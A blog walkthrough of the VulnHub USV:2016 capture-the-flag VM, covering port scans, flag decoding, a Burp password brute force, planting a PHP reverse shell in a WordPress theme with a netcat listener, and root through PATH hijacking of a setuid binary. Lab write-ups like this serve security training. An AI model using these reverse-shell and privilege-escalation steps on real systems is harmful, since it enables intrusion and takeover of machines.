5 December 2022

Pentesting Fun Stuff

following the cyber security path…

USV: 2016

Location

https://download.vulnhub.com/usv-2016/USV-CTF.ova

Introduction

Instructions: The CTF is a virtual machine and has been tested in Virtual Box. It has all required drivers if you want it to run on VMware or KVM (virtio). The network interface of the virtual machine will take it`s IP settings from DHCP.
Flags: There are 7 flags that should be discovered in form of: Country_name Flag: [md5 hash]. In CTF platform of the CTF-USV competition there was a hint available for each flag, but accessing it would imply a penalty. If you need any of those hints to solve the challenge, send me a message on Twitter @gusu_oana and I will be glad to help.
About: CTF-USV 2016 was the first International Students Contest in Information Security organized in Romania by Suceava University. Security challenges creation, evaluation of results and building of CTF environment was provided by Safetech Tech Team: Oana Stoian (@gusu_oana), Teodor Lupan (@theologu) and Ionut Georgescu (@ionutge1)

Getting Started

Starting with a nmap scan.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $sudo nmap -A -T4 -sSV -p- 192.168.171.3
Starting Nmap 7.40 ( https://nmap.org ) at 2016-12-28 21:27 CET
Nmap scan report for 192.168.171.3
Host is up (0.00088s latency).
Not shown: 65529 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 7.3 (protocol 2.0)
| ssh-hostkey:
|   2048 d8:b9:dd:8e:e7:d1:95:52:2c:98:bf:e0:65:7a:b0:92 (RSA)
|_  256 08:03:90:eb:24:5b:dd:67:f9:1f:4d:1e:60:93:a7:e3 (ECDSA)
80/tcp    open  http       Apache httpd
|_http-server-header: Apache
|_http-title: Access forbidden!
3129/tcp  open  http-proxy Squid http proxy 3.5.22
|_http-server-header: squid/3.5.22
|_http-title: ERROR: The requested URL could not be retrieved
3306/tcp  open  mysql      MariaDB (unauthorized)
4444/tcp  open  krb524?
| fingerprint-strings:
|   NULL:
|     HTTP/1.0 504 Gateway Timeout
|     Pragma: no-cache
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|_    <html><body>Connection to server <b></b> failed (Connection actively refused by the server.)<P></body></html> {600}
21211/tcp open  ftp        vsftpd 2.0.8 or later
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4444-TCP:V=7.40%I=7%D=12/28%Time=58642048%P=x86_64-pc-linux-gnu%r(N
SF:ULL,E1,"HTTP/1\.0\x20504\x20Gateway\x20Timeout\r\nPragma:\x20no-cache\r
SF:\nConnection:\x20close\r\nContent-Type:\x20text/html;\x20charset=utf-8\
SF:r\n\r\n<html><body>Connection\x20to\x20server\x20<b></b>\x20failed\x20\
SF:(Connection\x20actively\x20refused\x20by\x20the\x20server\.\)<P></body>
SF:</html>\x20{600}\n");
MAC Address: 08:00:27:2B:64:55 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: SevenKingdoms
TRACEROUTE
HOP RTT     ADDRESS
1   0.88 ms 192.168.171.3
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.55 seconds

As a result I get a lot of open ports and services running on them. It seems there is SSH, HTTP, HTTP-proxy, MySQL, Kerberos and a FTP running on a registered port.
The host name is “SevenKingdoms” which is a reference to the TV show “The Game of Thrones”.
I’ll start and check if there is an interesting banner on the SSH server.

I get a nice picture and a encrypted or hash+salted string. After looking at the picture more closely I see that there is a hidden message. There are letters visible when combined spell out:  AES ECB.
There are also characters visible near the tail. So I got an encryption suit, a key and a piece of cipher text.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-128-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-192-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number
┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $echo 'wDOW0gW/QssEtq5Y3nHX4XlbH/Dnz27qHFhHVpMulJSyDCvex++YCd42tx7HKGgB' | openssl enc -aes-256-ecb -d -a -k xxxxx0000000xxxxxx
bad magic number

As this doesn’t give me the desired response, I try an online solution with more luck.
Italy Flag: 0047449b33fbae830d833721edaef6f1
Next stop is port 80. After browsing to the website I get a custom made error 403.

All the scans turn up with the same error 403. After I ran Nikto I got a result that directory  /icons/ was accessible. Because there were a lot of pictures I could wget them all (in the hope one is altered), but because there are more leads to follow I write it down and continue the search.
When I run the website again, but this time through Burpsuite, I can see that there is a XSS protection in the server response in the form of a base64 encoded string.
Q3JvYXRpYSBGbGFnOiAwYzMyNjc4NDIxNDM5OGFlYjc1MDQ0ZTljZDRjMGViYg==
After a quick decode I get my second flag:  Croatia Flag: 0c326784214398aeb75044e9cd4c0ebb
There are more open ports. One is a squid proxy server on port 3129. After some reading I learned that squid is a web proxy cache server application which provides proxy and cache services for a whole list of services like HTTP. So my next step is to run my browser through that proxy and see if the website on port 80 will run.

With dirb I find a blog.

┌─[✗]─[n13mant@planetmars]─[~]
└──╼ $dirb http://192.168.171.3/ -p http://192.168.171.3:3129
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Dec 29 11:45:49 2016
URL_BASE: http://192.168.171.3/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.171.3:3129
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.171.3/ ----
==> DIRECTORY: http://192.168.171.3/blog/
+ http://192.168.171.3/index.html (CODE:200|SIZE:3181)
---- Entering directory: http://192.168.171.3/blog/ ----
+ http://192.168.171.3/blog/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.171.3/blog/wp-admin/
==> DIRECTORY: http://192.168.171.3/blog/wp-content/
==> DIRECTORY: http://192.168.171.3/blog/wp-includes/
+ http://192.168.171.3/blog/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.171.3/blog/wp-admin/ ----
+ http://192.168.171.3/blog/wp-admin/admin.php (CODE:302|SIZE:0)
-----SNIP-----

After I browsed to the blog I found a few things that got my attention. One of them was a picture of Hodor with the text  I have a message for you!.

After downloading it to my machine there was nothing to be found with exiftool or hexdump. But inside the folder where the picture resided there was something. A zipped file.
When I downloaded the file and extracted the picture that was inside, I got another view of Hodor. This time with my next flag. The string was part of the picture and not as metadata, so I used an online OCR scanner to get the string the easy way.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'UG9ydHVnYWwgRmxhZzogYTI2NjNiMjMwNDVkZTU2YzdlOTZhNDA2NDI5ZjczM2Y=' | base64 -d
Portugal Flag: a2663b23045de56c7e96a406429f733f

Next I proceed with the second interesting find on the website. A protected area for which I need a password. Because there is a lot of text on the website about “The Game of Thrones” I figure that the password could be somewhere in there. So I create a wordlist with Cewl.

┌─[n13mant@planetmars]─[~]
└──╼ $cewl -d 2 -m 5 --proxy_host 192.168.171.3 --proxy_port 3129 -w ./Desktop/tgot.list http://192.168.171.3/blog/

To understand the process of the submitting of the password I followed the HTTP requests in Burp. When I enter a random password the process starts with a POST request followed by a GET request which has a cookie added to it. This cookie consists of the encoded password I entered.


So for me to successfully brute-force the password I need Burpsuite to follow the redirects and add given cookies.


With this password I get the next flag.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'UGFyYWd1YXkgRmxhZzogNDc2MWI2NWYyMDA1MzY3NDY1N2M3ZTYxODY2MjhhMjk=' | base64 -d
Paraguay Flag: 4761b65f20053674657c7e6186628a29

On the same page there is a clue about a password.

At first I thought about the password and the possibility that the facial expressions showed a clue. But I’ve learned from previous challenges that the easiest explanation is often the best and the needed credentials are in plain sight. So I needed to interpret the text as literal as possible.
The “mother_of_dragons” has a password which is “in front of your eyes”.
With this credential I checked the leftover services running on the open ports. When I use it on the FTP server it let me in.

On the server there is a file called “readme.txt”. The content of this file is “I keep a hidden note for myself”. A hidden ‘note’. Like before the answer is in plain sight. The mentioned hidden note I found when browsing to “/.note.txt”
I always forgot passwords, so for my blog account I used my children`s name. -= Daenerys =-
No flag, but a good clue about the password needed for the admin part of wordpress blog.
The clue said “children’s name”, plural. So it could be her son or maybe the dragons as she sees them as her children.
Because there is a nice feature to let me reset the password I could figure out which username was the correct one. At first I thought it was “Daenerys”, but it seemed it was still “mother_of_dragons”. As for the correct password, it was a combination of all the dragon names that got me in.

After some browsing I found the next flag which was in the profile of the mother of dragons.

┌─[n13mant@planetmars]─[~]
└──╼ $echo 'VGhhaWxhbmQgRmxhZzogNmFkNzk2NWQxZTA1Y2E5OGIzZWZjNzZkYmY5ZmQ3MzM=' | base64 -d
Thailand Flag: 6ad7965d1e05ca98b3efc76dbf9fd733

To get a reversed shell I altered the search.php file and added the php reverse shell script from pentestmonkey to it. Next I opened up a listener on my end and pressed the search button to activate the shell script.

┌─[n13mant@planetmars]─[~]
└──╼ $nc -lvnp 31337
listening on [any] 31337 ...
connect to [192.168.171.2] from (UNKNOWN) [192.168.171.3] 38870
Linux arch 4.8.8-1-ARCH #1 SMP PREEMPT Tue Nov 15 08:25:24 CET 2016 x86_64 GNU/Linux
 07:58:47 up 11:45,  0 users,  load average: 0.03, 0.06, 0.02
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(http) gid=33(http) groups=33(http)
sh: cannot set terminal process group (242): Inappropriate ioctl for device
sh: no job control in this shell
sh-4.4$ id
id
uid=33(http) gid=33(http) groups=33(http)

After searching inside the system I found the next flag.

[http@arch /]$ ls -lah
ls -lah
total 57K
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 .
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 ..
lrwxrwxrwx  1 root root    7 Sep 30  2015 bin -> usr/bin
drwxr-xr-x  4 root root 1.0K Nov 16 12:30 boot
drwxr-xr-x 17 root root 2.9K Dec 28 20:13 dev
drwxr-xr-x 51 root root 4.0K Dec  8 17:51 etc
drwxr-xr-x  3 root root 4.0K Nov 16 15:44 home
lrwxrwxrwx  1 root root    7 Sep 30  2015 lib -> usr/lib
lrwxrwxrwx  1 root root    7 Sep 30  2015 lib64 -> usr/lib
drwx------  2 root root  16K Dec  5  2013 lost+found
drwxr-xr-x  2 root root 4.0K May 31  2013 mnt
drwxr-xr-x  2 root root 4.0K May 31  2013 opt
dr-xr-xr-x 95 root root    0 Dec 28 20:13 proc
drwxr-x---  7 root root 4.0K Dec 28 20:13 root
drwxr-xr-x 19 root root  600 Dec 28 20:13 run
lrwxrwxrwx  1 root root    7 Sep 30  2015 sbin -> usr/bin
drwxr-xr-x  4 root root 4.0K May 31  2013 srv
dr-xr-xr-x 13 root root    0 Dec 29 08:01 sys
drwxrwxrwt  2 root root   40 Dec 28 20:13 tmp
drwxr-xr-x  8 root root 4.0K Nov  7 20:39 usr
drwxr-xr-x 12 root root 4.0K Nov  7 19:58 var
[http@arch /]$ cd srv
cd srv
[http@arch srv]$ ls -lah
ls -lah
total 16K
drwxr-xr-x  4 root root 4.0K May 31  2013 .
drwxr-xr-x 17 root root 4.0K Nov  7 20:39 ..
dr-xr-xr-x  2 root ftp  4.0K May 31  2013 ftp
drwxr-xr-x  3 root root 4.0K Nov 17 15:43 http
[http@arch srv]$ cd http
cd http
[http@arch http]$ ls -lah
ls -lah
total 92K
drwxr-xr-x 3 root root 4.0K Nov 17 15:43 .
drwxr-xr-x 4 root root 4.0K May 31  2013 ..
drwxr-xr-x 6 http http 4.0K Dec  4 06:01 blog
-rw-r--r-- 1 root root  59K Nov 16 19:59 gtr.jpg
-rw-r--r-- 1 root root 3.2K Nov 16 20:01 index.html
-rw-r--r-- 1 root root   65 Nov 17 15:41 reward_flag.txt
-rwsr-sr-x 1 root root 8.3K Nov 17 14:55 winterfell_messenger
[http@arch http]$ cat reward_flag.txt
cat reward_flag.txt
TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=
[http@arch http]$ echo 'TW9uZ29saWEgRmxhZzogNmI0OWMxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d
<MxM2NjY2Q5MTk0MGYwOWQ3OWUxNDIxMDgzOTQ=' | base64 -d
Mongolia Flag: 6b49c13cccd91940f09d79e142108394

There is a file called “winterfell_messenger” which is owned by root.

[http@arch http]$ ./winterfell_messenger
./winterfell_messenger
cat: /root/message.txt: No such file or directory

When I run it I can see it tries to use the command “cat” and read a file called “/root/message.txt”.

[http@arch http]$ strings winterfell_messenger
strings winterfell_messenger
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-8
AWAVA
AUATL
[]A\A]A^A_
cat /root/message.txt
;*3$"
GCC: (GNU) 6.1.1 20160802
GCC: (GNU) 6.2.1 20160830
-----SNIP-----

So the “setuid” bit is set and the command “cat” is used with a relative path instead of an absolute path. To obtain root I’m going to create a file called “cat” which has as content “/bin/bash”.
The location of this file will be added to PATH so it will run my version of “cat”.

[http@arch http]$ echo "/bin/bash" > /tmp/cat
echo "/bin/bash" > /tmp/cat
[http@arch http]$ chmod +x /tmp/cat
chmod +x /tmp/cat
[http@arch http]$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
<p:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
[http@arch http]$ cd /srv/http
cd /srv/http
[http@arch http]$ ./winterfell_messenger
./winterfell_messenger
[root@arch http]# id
id
uid=0(root) gid=33(http) groups=33(http)

After getting root it’s time to get the final flag.

[root@arch root]# /usr/sbin/cat .flag.txt
/usr/sbin/cat .flag.txt
                                                                            ,aa,       ,aa
Congratulations!                                                           d"  "b    ,d",`b
                                                                         ,dP a  "b,ad8' 8 8
                                                                         d8' 8  ,8P'Y8a 8 8
                                                                        d8baa8baP'    `Y8a8
                                                                     ,adP"'               Y,
                                                                  ,a8P"               a   `b
                                                              ,aadP"              (0  Y, 0 8
                          ____________________________,,aaddPP""'8'         I          "a  8
                    ,aad8PP"""""""""""""""""""""""""""""'        8,         `b,          "aP
                ,adP"                                             "a          "ba,.     d888
             ,dP"                                                   "a,           "a,   `88'
            a"                                                         "'           `""8"'
           d"                                                                        ,8'
          d"                                                                        ,8'
          8                                                                       ,a8'
          8                         b                                            aP"
          8                         `b                                         ,8"
         (8    b,                    `b,                 a,                   dP'
         I8    `8,                    `b                d'                 ,aP"
         8'     `8,                   ,P               d'               ,a8P"
        I8       "b                  ,8'              ,8             ,d"d"'
       ,8'        8b               ,dP""""""""""""""""Y8           ,d",d'
     ,d"         d"8b            ,dP'                  "b,        ,P' d'
   ,d"         ,d' dPb,        ,dP'                      "b,      8'  8
  d"         ,d" ,d"  8      ,d"'                         `b      P   8
 d"        ,d" ,d"  ,d"    ,d"                             8      I   8
d"      ,dP' ,d"  ,d"    ,d"                               8      I   8
8,  ,ad8P' ,d"   (P'    d"                                 8      8   8
"YP"'"8   ,8'    Ib    d"                                  Y      8   8
      8   d"     `8    8                                   `b     8   Y
      8   8       8,   8,                                   8     Y   `b
      8   Y,      `b   `b                                   Y     `b   `b
      Y,   "ba,    `b   `b,                                 `b     8,   `"ba,
       "b,   "8     `b    `""b                               `b     `Yaa,adP'
         """""'      `baaaaaaP                                `YaaaadP"'
U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==
┌─[n13mant@planetmars]─[~]
└──╼ $echo 'U29tYWxpYSBGbGFnOiA0YTY0YTU3NWJlODBmOGZmYWIyNmIwNmE5NThiY2YzNA==' | base64 -d
Somalia Flag: 4a64a575be80f8ffab26b06a958bcf34

Conclusion

A fun challenge with some nice features.
 
 
 

3 thoughts on “USV: 2016

  1. Could you please post exactly how to set up BURP SUITE — I’ve spent like 3 days going through different POST and GET and transitioning between what to define in the ADD portion and launching attacks to brute fore the password….I’m on the Secret Chapter page… But what should the Target IP and Port be, the Positions (what to define in the ADD), the Payloads (CEWL wordlist), and options. I’m getting 400’s and 403’s on both POST and GET – but joy on finding a 200 listing for the password.
    I can get the Cookies and forwards from the webpage. I’m starting with the actual server refresh then re-doing the Settings in Ice Weasel to 127.0.0.1 8080 – and submitting a 1234 password to get a response. At some point, I changed it back to the USV server’s IP address and start new attacks…but nothing…
    Many Thanks! J

    1. Hi Jo.
      In my write-up I’ve explained that you need to enable the options ‘follow redirections’ and ‘process cookies’.
      The rest is normal procedure with a brute-force attack. You need to acquire the wordlist and run the attack.
      As you can see in my example you will get a lot of code 200. But there is one thing that stands out from the rest. If you find that, you’ll find the password.
      If you need more information on how Burpsuite works, this will be a great read: part 1 and part 2

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.